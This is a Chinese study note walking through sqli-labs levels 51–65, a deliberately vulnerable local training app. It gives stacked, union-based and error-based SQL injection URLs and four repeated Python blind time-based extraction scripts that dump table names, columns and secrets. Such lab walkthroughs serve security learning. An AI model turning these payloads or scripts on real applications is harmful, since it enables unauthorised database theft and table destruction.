[sqli-labs] 学习3
less-51
- 跟50关相比,改了闭合符
http://127.0.0.1/sqli-labs/Less-51?sort=1' ; create table test like users; %23
less-52
- 和50关一样,只是这里不回显了
http://127.0.0.1/sqli-labs/Less-52?sort=1 ; drop table test; %23
less-53
- 跟51关一样,不回显
http://127.0.0.1/sqli-labs/Less-53?sort=1' ; create table test like users; %23
less-54
- 将之前所学的做汇总练习
http://127.0.0.1/sqli-labs/Less-54?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema = 'CHALLENGES' %23
http://127.0.0.1/sqli-labs/Less-54?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name = 'ST8PASK3ZR' %23
http://127.0.0.1/sqli-labs/Less-54?id=-1' union select 1,group_concat(secret_7IDH),3 from ST8PASK3ZR %23
less-55
http://127.0.0.1/sqli-labs/Less-55?id=-1) union select 1,group_concat(table_name),3 from information_schema.tables where table_schema = 'CHALLENGES' %23
http://127.0.0.1/sqli-labs/Less-55?id=-1) union select 1,group_concat(column_name),3 from information_schema.columns where table_name = 'R0Y2LHLPA2' %23
http://127.0.0.1/sqli-labs/Less-55?id=-1) union select 1,group_concat(secret_46NL),3 from R0Y2LHLPA2 %23
less-56
http://127.0.0.1/sqli-labs/Less-56?id=-1') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema = 'challenges' %23
http://127.0.0.1/sqli-labs/Less-56?id=-1') union select 1,group_concat(column_name),3 from information_schema.columns where table_name = '2SHDB477I0' %23
http://127.0.0.1/sqli-labs/Less-56?id=-1') union select 1,group_concat(secret_YC5R),3 from 2SHDB477I0 %23
less-57
http://127.0.0.1/sqli-labs/Less-57?id=-1" union select 1,group_concat(table_name),3 from information_schema.tables where table_schema = 'challenges' %23
http://127.0.0.1/sqli-labs/Less-57?id=-1" union select 1,group_concat(column_name),3 from information_schema.columns where table_name = 'E5DYF70WFZ' %23
http://127.0.0.1/sqli-labs/Less-57?id=-1" union select 1,group_concat(secret_3IN5),3 from E5DYF70WFZ %23
less-58
- 没有返回数据库中的数据,无法使用union联合注入,使用报错注入
http://127.0.0.1/sqli-labs/Less-58?id=-1' union select 1,2,extractvalue(1,concat(0x7e,( select group_concat(table_name) from information_schema.tables where table_schema = 'challenges' ),0x7e)) %23
http://127.0.0.1/sqli-labs/Less-58?id=-1' union select 1,2,extractvalue(1,concat(0x7e,( select group_concat(column_name) from information_schema.columns where table_name = 'Z93Q7U21K3' ),0x7e)) %23
http://127.0.0.1/sqli-labs/Less-58?id=-1' union select 1,2,extractvalue(1,concat(0x7e,( select group_concat(secret_OEMW) from Z93Q7U21K3 ),0x7e)) %23
less-59
- 跟58关差不多,没有闭合符
http://127.0.0.1/sqli-labs/Less-59?id=1 union select 1,2,extractvalue(1,concat(0x7e, (select group_concat(table_name) from information_schema.tables where table_schema = 'challenges' ) ,0x7e)) %23
http://127.0.0.1/sqli-labs/Less-59?id=1 union select 1,2,extractvalue(1,concat(0x7e, (select group_concat(column_name) from information_schema.columns where table_name = '3MIJ14LKWG' ) ,0x7e)) %23
http://127.0.0.1/sqli-labs/Less-59?id=1 union select 1,2,extractvalue(1,concat(0x7e, (select group_concat(secret_NWS2) from 3MIJ14LKWG ) ,0x7e)) %23
less-60
- 跟58关差不多,换了闭合符
http://127.0.0.1/sqli-labs/Less-60?id=-1") union select 1,2,extractvalue(1,concat(0x7e, (select group_concat(table_name) from information_schema.tables where table_schema = 'challenges' ) ,0x7e)) %23
http://127.0.0.1/sqli-labs/Less-60?id=-1") union select 1,2,extractvalue(1,concat(0x7e, (select group_concat(column_name) from information_schema.columns where table_name = '085KOCKZF6' ) ,0x7e)) %23
http://127.0.0.1/sqli-labs/Less-60?id=-1") union select 1,2,extractvalue(1,concat(0x7e, (select group_concat(secret_H2EF) from 085KOCKZF6 ) ,0x7e)) %23
less-61
- 跟58关差不多,换了闭合符
http://127.0.0.1/sqli-labs/Less-61?id=1')) union select 1,2,extractvalue(1,concat(0x7e, (select group_concat(table_name) from information_schema.tables where table_schema = 'challenges' ) ,0x7e)) %23
http://127.0.0.1/sqli-labs/Less-61?id=1')) union select 1,2,extractvalue(1,concat(0x7e, (select group_concat(column_name) from information_schema.columns where table_name = 'JHXA7SZKSY' ) ,0x7e)) %23
http://127.0.0.1/sqli-labs/Less-61?id=1')) union select 1,2,extractvalue(1,concat(0x7e, (select group_concat(secret_E8XU) from JHXA7SZKSY ) ,0x7e)) %23
less-62
- 只能用延时注入,写个脚本跑一下就可以了
import requests
import string
import time
# Candidate alphabet for the character-by-character guessing below: lowercase,
# uppercase, digits and ASCII punctuation (Python 2 ``string.lowercase``/``string.uppercase``).
# NOTE(review): the name shadows the builtin ``list`` for the rest of the module.
list = string.lowercase + string.uppercase + string.digits + '!\"$%&\'()*+,-./:;<=>?@[\\]^_`{|}~'
def leak_tables(url,cmd,inj_point):
    """Read table names of the ``challenges`` schema, one character per request.

    Args:
        url: base URL of the lab page (this file points it at 127.0.0.1).
        cmd: injection template with three ``{}`` slots, filled in order with
            the sub-select, the prefix length handed to ``left()``, and the
            guessed prefix.
        inj_point: name of the GET parameter the filled template is sent in.

    Returns:
        The table names in ``limit l,1`` row order. The function returns as
        soon as a row offset yields no first character, i.e. the offset ran
        past the last table.
    """
    tables = []
    l = 0  # row offset for the ``limit {},1`` clause: one table per row
    while True:
        table_name = ""
        sql_1 = '(select table_name from information_schema.tables where table_schema = "challenges" limit {},1)'.format(l)
        i = 1  # prefix length for ``left()``; grows by one per confirmed character
        while True:
            flags = 0  # becomes 1 once some candidate character is confirmed at position i
            # ``list`` is the module-level candidate alphabet (it shadows the builtin).
            for j in list:
                startime = time.time()
                cmd1 = cmd.format(sql_1,i,table_name+j)
                payload = {inj_point:cmd1}
                r = requests.get(url,params=payload)
                #print r.url
                # NOTE(review): ``respond`` is assigned but never read; nothing in the
                # response body is inspected, only the elapsed time below.
                respond = r.text.encode('utf-8')
                # The ``injection`` template in this file runs ``sleep(3)`` only when the
                # guessed prefix is correct, so a slow response is treated as a match.
                # NOTE(review): the threshold equals the injected sleep length, so a
                # legitimately slow response is counted as a match as well.
                if time.time() - startime > 3:
                    #print table_name
                    table_name += j
                    flags = 1
                    break
            # No first character at this row offset: there are no more tables.
            if not table_name:
                return tables
            # No character matched at position i: the current name is complete.
            if not flags:
                tables.append(table_name)
                break
            i += 1
        l += 1
def leak_columns(url,cmd,inj_point,table_name):
    """Read the column names of ``table_name``, one character per request.

    Args:
        url: base URL of the lab page.
        cmd: injection template with three ``{}`` slots (sub-select, prefix
            length for ``left()``, guessed prefix).
        inj_point: name of the GET parameter the filled template is sent in.
        table_name: table looked up in ``information_schema.columns``.

    Returns:
        The column names in ``limit l,1`` row order; returns as soon as a row
        offset yields no first character.
    """
    columns = []
    l = 0  # row offset for the ``limit {},1`` clause: one column per row
    while True:
        column_name = ""
        # table_name is interpolated into the sub-select as a single-quoted literal.
        sql_1 = "(select column_name from information_schema.columns where table_name = '{}' limit {},1)".format(table_name,l)
        i = 1  # prefix length for ``left()``
        while True:
            flags = 0  # becomes 1 once a candidate character is confirmed at position i
            # ``list`` is the module-level candidate alphabet (it shadows the builtin).
            for j in list:
                startime = time.time()
                cmd1 = cmd.format(sql_1,i,column_name+j)
                payload = {inj_point:cmd1}
                r = requests.get(url,params=payload)
                # NOTE(review): ``respond`` is never read; only the elapsed time matters here.
                respond = r.text.encode('utf-8')
                # A response slower than 3 s means the template's conditional ``sleep(3)``
                # ran, i.e. the guessed prefix matched.
                if time.time() - startime > 3:
                    #print column_name
                    column_name += j
                    flags = 1
                    break
            # No first character at this offset: no more columns.
            if not column_name:
                return columns
            # Nothing matched at position i: the current name is complete.
            if not flags:
                columns.append(column_name)
                break
            i += 1
        l += 1
def leak_content(url,cmd,inj_point,column_name,table_name):
    """Read every value of ``column_name`` in ``table_name``, one character per request.

    Args:
        url: base URL of the lab page.
        cmd: injection template with three ``{}`` slots (sub-select, prefix
            length for ``left()``, guessed prefix).
        inj_point: name of the GET parameter the filled template is sent in.
        column_name: column selected by the sub-select (interpolated unquoted).
        table_name: table selected from (interpolated unquoted).

    Returns:
        The values read, one per ``limit l,1`` row. The loop stops at the first
        row offset that yields no first character, so an empty value would end
        it early as well.
    """
    contents = []
    l = 0  # row offset for the ``limit {},1`` clause: one row at a time
    while True:
        content_name = ""
        sql_1 = "(select {} from {} limit {},1)".format(column_name,table_name,l)
        i = 1  # prefix length for ``left()``
        while True:
            flags = 0  # becomes 1 once a candidate character is confirmed at position i
            # ``list`` is the module-level candidate alphabet (it shadows the builtin).
            for j in list:
                startime = time.time()
                cmd1 = cmd.format(sql_1,i,content_name+j)
                payload = {inj_point:cmd1}
                r = requests.get(url,params=payload)
                # NOTE(review): ``respond`` is never read; only the elapsed time matters here.
                respond = r.text.encode('utf-8')
                # A response slower than 3 s means the template's conditional ``sleep(3)``
                # ran, i.e. the guessed prefix matched.
                if time.time() - startime > 3:
                    content_name += j
                    flags = 1
                    break
            # No first character at this offset: no more rows (or an empty value).
            if not content_name:
                return contents
            # Nothing matched at position i: the current value is complete.
            if not flags:
                contents.append(content_name)
                break
            i += 1
        l += 1
url = 'http://127.0.0.1/sqli-labs/less-62' #url
# Template with three ``{}`` slots: sub-select, prefix length for left(), guessed prefix.
# ``1')`` is this level's closing sequence (see the note above); the trailing ``#``
# comments out whatever the page appends after the parameter.
injection = "1') and if( (left({},{}) = '{}') , sleep(3) , 0) #" #injection
table_name = leak_tables(url,injection,'id')
print "table name: ",table_name
# Uses the first table found; raises IndexError if no table came back.
column_name = leak_columns(url,injection,'id',table_name[0])
print 'column name: ',column_name
# Index 2 presumes the secret is the third column listed -- TODO confirm against the printed column list.
secret = leak_content(url,injection,'id',column_name[2],table_name[0])
print 'secret : ',secret
less-63
- 跟62一样是延时注入,换了闭合符,跑脚本
import requests
import string
import time
# Candidate alphabet for the character-by-character guessing below: lowercase,
# uppercase, digits and ASCII punctuation (Python 2 ``string.lowercase``/``string.uppercase``).
# NOTE(review): the name shadows the builtin ``list`` for the rest of the module.
list = string.lowercase + string.uppercase + string.digits + '!\"$%&\'()*+,-./:;<=>?@[\\]^_`{|}~'
def leak_tables(url,cmd,inj_point):
    """Read table names of the ``challenges`` schema, one character per request.

    Args:
        url: base URL of the lab page (this file points it at 127.0.0.1).
        cmd: injection template with three ``{}`` slots, filled in order with
            the sub-select, the prefix length handed to ``left()``, and the
            guessed prefix.
        inj_point: name of the GET parameter the filled template is sent in.

    Returns:
        The table names in ``limit l,1`` row order. The function returns as
        soon as a row offset yields no first character, i.e. the offset ran
        past the last table.
    """
    tables = []
    l = 0  # row offset for the ``limit {},1`` clause: one table per row
    while True:
        table_name = ""
        sql_1 = '(select table_name from information_schema.tables where table_schema = "challenges" limit {},1)'.format(l)
        i = 1  # prefix length for ``left()``; grows by one per confirmed character
        while True:
            flags = 0  # becomes 1 once some candidate character is confirmed at position i
            # ``list`` is the module-level candidate alphabet (it shadows the builtin).
            for j in list:
                startime = time.time()
                cmd1 = cmd.format(sql_1,i,table_name+j)
                payload = {inj_point:cmd1}
                r = requests.get(url,params=payload)
                #print r.url
                # NOTE(review): ``respond`` is assigned but never read; nothing in the
                # response body is inspected, only the elapsed time below.
                respond = r.text.encode('utf-8')
                # The ``injection`` template in this file runs ``sleep(3)`` only when the
                # guessed prefix is correct, so a slow response is treated as a match.
                # NOTE(review): the threshold equals the injected sleep length, so a
                # legitimately slow response is counted as a match as well.
                if time.time() - startime > 3:
                    #print table_name
                    table_name += j
                    flags = 1
                    break
            # No first character at this row offset: there are no more tables.
            if not table_name:
                return tables
            # No character matched at position i: the current name is complete.
            if not flags:
                tables.append(table_name)
                break
            i += 1
        l += 1
def leak_columns(url,cmd,inj_point,table_name):
    """Read the column names of ``table_name``, one character per request.

    Args:
        url: base URL of the lab page.
        cmd: injection template with three ``{}`` slots (sub-select, prefix
            length for ``left()``, guessed prefix).
        inj_point: name of the GET parameter the filled template is sent in.
        table_name: table looked up in ``information_schema.columns``.

    Returns:
        The column names in ``limit l,1`` row order; returns as soon as a row
        offset yields no first character.
    """
    columns = []
    l = 0  # row offset for the ``limit {},1`` clause: one column per row
    while True:
        column_name = ""
        # table_name is interpolated into the sub-select as a single-quoted literal.
        sql_1 = "(select column_name from information_schema.columns where table_name = '{}' limit {},1)".format(table_name,l)
        i = 1  # prefix length for ``left()``
        while True:
            flags = 0  # becomes 1 once a candidate character is confirmed at position i
            # ``list`` is the module-level candidate alphabet (it shadows the builtin).
            for j in list:
                startime = time.time()
                cmd1 = cmd.format(sql_1,i,column_name+j)
                payload = {inj_point:cmd1}
                r = requests.get(url,params=payload)
                # NOTE(review): ``respond`` is never read; only the elapsed time matters here.
                respond = r.text.encode('utf-8')
                # A response slower than 3 s means the template's conditional ``sleep(3)``
                # ran, i.e. the guessed prefix matched.
                if time.time() - startime > 3:
                    #print column_name
                    column_name += j
                    flags = 1
                    break
            # No first character at this offset: no more columns.
            if not column_name:
                return columns
            # Nothing matched at position i: the current name is complete.
            if not flags:
                columns.append(column_name)
                break
            i += 1
        l += 1
def leak_content(url,cmd,inj_point,column_name,table_name):
    """Read every value of ``column_name`` in ``table_name``, one character per request.

    Args:
        url: base URL of the lab page.
        cmd: injection template with three ``{}`` slots (sub-select, prefix
            length for ``left()``, guessed prefix).
        inj_point: name of the GET parameter the filled template is sent in.
        column_name: column selected by the sub-select (interpolated unquoted).
        table_name: table selected from (interpolated unquoted).

    Returns:
        The values read, one per ``limit l,1`` row. The loop stops at the first
        row offset that yields no first character, so an empty value would end
        it early as well.
    """
    contents = []
    l = 0  # row offset for the ``limit {},1`` clause: one row at a time
    while True:
        content_name = ""
        sql_1 = "(select {} from {} limit {},1)".format(column_name,table_name,l)
        i = 1  # prefix length for ``left()``
        while True:
            flags = 0  # becomes 1 once a candidate character is confirmed at position i
            # ``list`` is the module-level candidate alphabet (it shadows the builtin).
            for j in list:
                startime = time.time()
                cmd1 = cmd.format(sql_1,i,content_name+j)
                payload = {inj_point:cmd1}
                r = requests.get(url,params=payload)
                # NOTE(review): ``respond`` is never read; only the elapsed time matters here.
                respond = r.text.encode('utf-8')
                # A response slower than 3 s means the template's conditional ``sleep(3)``
                # ran, i.e. the guessed prefix matched.
                if time.time() - startime > 3:
                    content_name += j
                    flags = 1
                    break
            # No first character at this offset: no more rows (or an empty value).
            if not content_name:
                return contents
            # Nothing matched at position i: the current value is complete.
            if not flags:
                contents.append(content_name)
                break
            i += 1
        l += 1
url = 'http://127.0.0.1/sqli-labs/less-63' #url
# Template with three ``{}`` slots: sub-select, prefix length for left(), guessed prefix.
# ``1'`` is this level's closing sequence (see the note above); the trailing ``#``
# comments out whatever the page appends after the parameter.
injection = "1' and if( (left({},{}) = '{}') , sleep(3) , 0) #" #injection
table_name = leak_tables(url,injection,'id')
print "table name: ",table_name
# Uses the first table found; raises IndexError if no table came back.
column_name = leak_columns(url,injection,'id',table_name[0])
print 'column name: ',column_name
# Index 2 presumes the secret is the third column listed -- TODO confirm against the printed column list.
secret = leak_content(url,injection,'id',column_name[2],table_name[0])
print 'secret : ',secret
less-64
- 跟62关一样,闭合符换成了))
import requests
import string
import time
# Candidate alphabet for the character-by-character guessing below: lowercase,
# uppercase, digits and ASCII punctuation (Python 2 ``string.lowercase``/``string.uppercase``).
# NOTE(review): the name shadows the builtin ``list`` for the rest of the module.
list = string.lowercase + string.uppercase + string.digits + '!\"$%&\'()*+,-./:;<=>?@[\\]^_`{|}~'
def leak_tables(url,cmd,inj_point):
    """Read table names of the ``challenges`` schema, one character per request.

    Args:
        url: base URL of the lab page (this file points it at 127.0.0.1).
        cmd: injection template with three ``{}`` slots, filled in order with
            the sub-select, the prefix length handed to ``left()``, and the
            guessed prefix.
        inj_point: name of the GET parameter the filled template is sent in.

    Returns:
        The table names in ``limit l,1`` row order. The function returns as
        soon as a row offset yields no first character, i.e. the offset ran
        past the last table.
    """
    tables = []
    l = 0  # row offset for the ``limit {},1`` clause: one table per row
    while True:
        table_name = ""
        sql_1 = '(select table_name from information_schema.tables where table_schema = "challenges" limit {},1)'.format(l)
        i = 1  # prefix length for ``left()``; grows by one per confirmed character
        while True:
            flags = 0  # becomes 1 once some candidate character is confirmed at position i
            # ``list`` is the module-level candidate alphabet (it shadows the builtin).
            for j in list:
                startime = time.time()
                cmd1 = cmd.format(sql_1,i,table_name+j)
                payload = {inj_point:cmd1}
                r = requests.get(url,params=payload)
                #print r.url
                # NOTE(review): ``respond`` is assigned but never read; nothing in the
                # response body is inspected, only the elapsed time below.
                respond = r.text.encode('utf-8')
                # The ``injection`` template in this file runs ``sleep(3)`` only when the
                # guessed prefix is correct, so a slow response is treated as a match.
                # NOTE(review): the threshold equals the injected sleep length, so a
                # legitimately slow response is counted as a match as well.
                if time.time() - startime > 3:
                    #print table_name
                    table_name += j
                    flags = 1
                    break
            # No first character at this row offset: there are no more tables.
            if not table_name:
                return tables
            # No character matched at position i: the current name is complete.
            if not flags:
                tables.append(table_name)
                break
            i += 1
        l += 1
def leak_columns(url,cmd,inj_point,table_name):
    """Read the column names of ``table_name``, one character per request.

    Args:
        url: base URL of the lab page.
        cmd: injection template with three ``{}`` slots (sub-select, prefix
            length for ``left()``, guessed prefix).
        inj_point: name of the GET parameter the filled template is sent in.
        table_name: table looked up in ``information_schema.columns``.

    Returns:
        The column names in ``limit l,1`` row order; returns as soon as a row
        offset yields no first character.
    """
    columns = []
    l = 0  # row offset for the ``limit {},1`` clause: one column per row
    while True:
        column_name = ""
        # table_name is interpolated into the sub-select as a single-quoted literal.
        sql_1 = "(select column_name from information_schema.columns where table_name = '{}' limit {},1)".format(table_name,l)
        i = 1  # prefix length for ``left()``
        while True:
            flags = 0  # becomes 1 once a candidate character is confirmed at position i
            # ``list`` is the module-level candidate alphabet (it shadows the builtin).
            for j in list:
                startime = time.time()
                cmd1 = cmd.format(sql_1,i,column_name+j)
                payload = {inj_point:cmd1}
                r = requests.get(url,params=payload)
                # NOTE(review): ``respond`` is never read; only the elapsed time matters here.
                respond = r.text.encode('utf-8')
                # A response slower than 3 s means the template's conditional ``sleep(3)``
                # ran, i.e. the guessed prefix matched.
                if time.time() - startime > 3:
                    #print column_name
                    column_name += j
                    flags = 1
                    break
            # No first character at this offset: no more columns.
            if not column_name:
                return columns
            # Nothing matched at position i: the current name is complete.
            if not flags:
                columns.append(column_name)
                break
            i += 1
        l += 1
def leak_content(url,cmd,inj_point,column_name,table_name):
    """Read every value of ``column_name`` in ``table_name``, one character per request.

    Args:
        url: base URL of the lab page.
        cmd: injection template with three ``{}`` slots (sub-select, prefix
            length for ``left()``, guessed prefix).
        inj_point: name of the GET parameter the filled template is sent in.
        column_name: column selected by the sub-select (interpolated unquoted).
        table_name: table selected from (interpolated unquoted).

    Returns:
        The values read, one per ``limit l,1`` row. The loop stops at the first
        row offset that yields no first character, so an empty value would end
        it early as well.
    """
    contents = []
    l = 0  # row offset for the ``limit {},1`` clause: one row at a time
    while True:
        content_name = ""
        sql_1 = "(select {} from {} limit {},1)".format(column_name,table_name,l)
        i = 1  # prefix length for ``left()``
        while True:
            flags = 0  # becomes 1 once a candidate character is confirmed at position i
            # ``list`` is the module-level candidate alphabet (it shadows the builtin).
            for j in list:
                startime = time.time()
                cmd1 = cmd.format(sql_1,i,content_name+j)
                payload = {inj_point:cmd1}
                r = requests.get(url,params=payload)
                # NOTE(review): ``respond`` is never read; only the elapsed time matters here.
                respond = r.text.encode('utf-8')
                # A response slower than 3 s means the template's conditional ``sleep(3)``
                # ran, i.e. the guessed prefix matched.
                if time.time() - startime > 3:
                    content_name += j
                    flags = 1
                    break
            # No first character at this offset: no more rows (or an empty value).
            if not content_name:
                return contents
            # Nothing matched at position i: the current value is complete.
            if not flags:
                contents.append(content_name)
                break
            i += 1
        l += 1
url = 'http://127.0.0.1/sqli-labs/less-64' #url
# Template with three ``{}`` slots: sub-select, prefix length for left(), guessed prefix.
# ``1))`` is this level's closing sequence (see the note above); the trailing ``#``
# comments out whatever the page appends after the parameter.
injection = "1)) and if( (left({},{}) = '{}') , sleep(3) , 0) #" #injection
table_name = leak_tables(url,injection,'id')
print "table name: ",table_name
# Uses the first table found; raises IndexError if no table came back.
column_name = leak_columns(url,injection,'id',table_name[0])
print 'column name: ',column_name
# Index 2 presumes the secret is the third column listed -- TODO confirm against the printed column list.
secret = leak_content(url,injection,'id',column_name[2],table_name[0])
print 'secret : ',secret
less-65
- 跟62关一样,闭合符变成了")
import requests
import string
import time
# Candidate alphabet for the character-by-character guessing below: lowercase,
# uppercase, digits and ASCII punctuation (Python 2 ``string.lowercase``/``string.uppercase``).
# NOTE(review): the name shadows the builtin ``list`` for the rest of the module.
list = string.lowercase + string.uppercase + string.digits + '!\"$%&\'()*+,-./:;<=>?@[\\]^_`{|}~'
def leak_tables(url,cmd,inj_point):
    """Read table names of the ``challenges`` schema, one character per request.

    Args:
        url: base URL of the lab page (this file points it at 127.0.0.1).
        cmd: injection template with three ``{}`` slots, filled in order with
            the sub-select, the prefix length handed to ``left()``, and the
            guessed prefix.
        inj_point: name of the GET parameter the filled template is sent in.

    Returns:
        The table names in ``limit l,1`` row order. The function returns as
        soon as a row offset yields no first character, i.e. the offset ran
        past the last table.
    """
    tables = []
    l = 0  # row offset for the ``limit {},1`` clause: one table per row
    while True:
        table_name = ""
        sql_1 = '(select table_name from information_schema.tables where table_schema = "challenges" limit {},1)'.format(l)
        i = 1  # prefix length for ``left()``; grows by one per confirmed character
        while True:
            flags = 0  # becomes 1 once some candidate character is confirmed at position i
            # ``list`` is the module-level candidate alphabet (it shadows the builtin).
            for j in list:
                startime = time.time()
                cmd1 = cmd.format(sql_1,i,table_name+j)
                payload = {inj_point:cmd1}
                r = requests.get(url,params=payload)
                #print r.url
                # NOTE(review): ``respond`` is assigned but never read; nothing in the
                # response body is inspected, only the elapsed time below.
                respond = r.text.encode('utf-8')
                # The ``injection`` template in this file runs ``sleep(3)`` only when the
                # guessed prefix is correct, so a slow response is treated as a match.
                # NOTE(review): the threshold equals the injected sleep length, so a
                # legitimately slow response is counted as a match as well.
                if time.time() - startime > 3:
                    #print table_name
                    table_name += j
                    flags = 1
                    break
            # No first character at this row offset: there are no more tables.
            if not table_name:
                return tables
            # No character matched at position i: the current name is complete.
            if not flags:
                tables.append(table_name)
                break
            i += 1
        l += 1
def leak_columns(url,cmd,inj_point,table_name):
    """Read the column names of ``table_name``, one character per request.

    Args:
        url: base URL of the lab page.
        cmd: injection template with three ``{}`` slots (sub-select, prefix
            length for ``left()``, guessed prefix).
        inj_point: name of the GET parameter the filled template is sent in.
        table_name: table looked up in ``information_schema.columns``.

    Returns:
        The column names in ``limit l,1`` row order; returns as soon as a row
        offset yields no first character.
    """
    columns = []
    l = 0  # row offset for the ``limit {},1`` clause: one column per row
    while True:
        column_name = ""
        # table_name is interpolated into the sub-select as a single-quoted literal.
        sql_1 = "(select column_name from information_schema.columns where table_name = '{}' limit {},1)".format(table_name,l)
        i = 1  # prefix length for ``left()``
        while True:
            flags = 0  # becomes 1 once a candidate character is confirmed at position i
            # ``list`` is the module-level candidate alphabet (it shadows the builtin).
            for j in list:
                startime = time.time()
                cmd1 = cmd.format(sql_1,i,column_name+j)
                payload = {inj_point:cmd1}
                r = requests.get(url,params=payload)
                # NOTE(review): ``respond`` is never read; only the elapsed time matters here.
                respond = r.text.encode('utf-8')
                # A response slower than 3 s means the template's conditional ``sleep(3)``
                # ran, i.e. the guessed prefix matched.
                if time.time() - startime > 3:
                    #print column_name
                    column_name += j
                    flags = 1
                    break
            # No first character at this offset: no more columns.
            if not column_name:
                return columns
            # Nothing matched at position i: the current name is complete.
            if not flags:
                columns.append(column_name)
                break
            i += 1
        l += 1
def leak_content(url,cmd,inj_point,column_name,table_name):
    """Read every value of ``column_name`` in ``table_name``, one character per request.

    Args:
        url: base URL of the lab page.
        cmd: injection template with three ``{}`` slots (sub-select, prefix
            length for ``left()``, guessed prefix).
        inj_point: name of the GET parameter the filled template is sent in.
        column_name: column selected by the sub-select (interpolated unquoted).
        table_name: table selected from (interpolated unquoted).

    Returns:
        The values read, one per ``limit l,1`` row. The loop stops at the first
        row offset that yields no first character, so an empty value would end
        it early as well.
    """
    contents = []
    l = 0  # row offset for the ``limit {},1`` clause: one row at a time
    while True:
        content_name = ""
        sql_1 = "(select {} from {} limit {},1)".format(column_name,table_name,l)
        i = 1  # prefix length for ``left()``
        while True:
            flags = 0  # becomes 1 once a candidate character is confirmed at position i
            # ``list`` is the module-level candidate alphabet (it shadows the builtin).
            for j in list:
                startime = time.time()
                cmd1 = cmd.format(sql_1,i,content_name+j)
                payload = {inj_point:cmd1}
                r = requests.get(url,params=payload)
                # NOTE(review): ``respond`` is never read; only the elapsed time matters here.
                respond = r.text.encode('utf-8')
                # A response slower than 3 s means the template's conditional ``sleep(3)``
                # ran, i.e. the guessed prefix matched.
                if time.time() - startime > 3:
                    content_name += j
                    flags = 1
                    break
            # No first character at this offset: no more rows (or an empty value).
            if not content_name:
                return contents
            # Nothing matched at position i: the current value is complete.
            if not flags:
                contents.append(content_name)
                break
            i += 1
        l += 1
url = 'http://127.0.0.1/sqli-labs/less-65' #url
# Template with three ``{}`` slots: sub-select, prefix length for left(), guessed prefix.
# ``1")`` is this level's closing sequence (see the note above); the trailing ``#``
# comments out whatever the page appends after the parameter.
injection = "1\") and if( (left({},{}) = '{}') , sleep(3) , 0) #" #injection
table_name = leak_tables(url,injection,'id')
print "table name: ",table_name
# Uses the first table found; raises IndexError if no table came back.
column_name = leak_columns(url,injection,'id',table_name[0])
print 'column name: ',column_name
# Index 2 presumes the secret is the third column listed -- TODO confirm against the printed column list.
secret = leak_content(url,injection,'id',column_name[2],table_name[0])
print 'secret : ',secret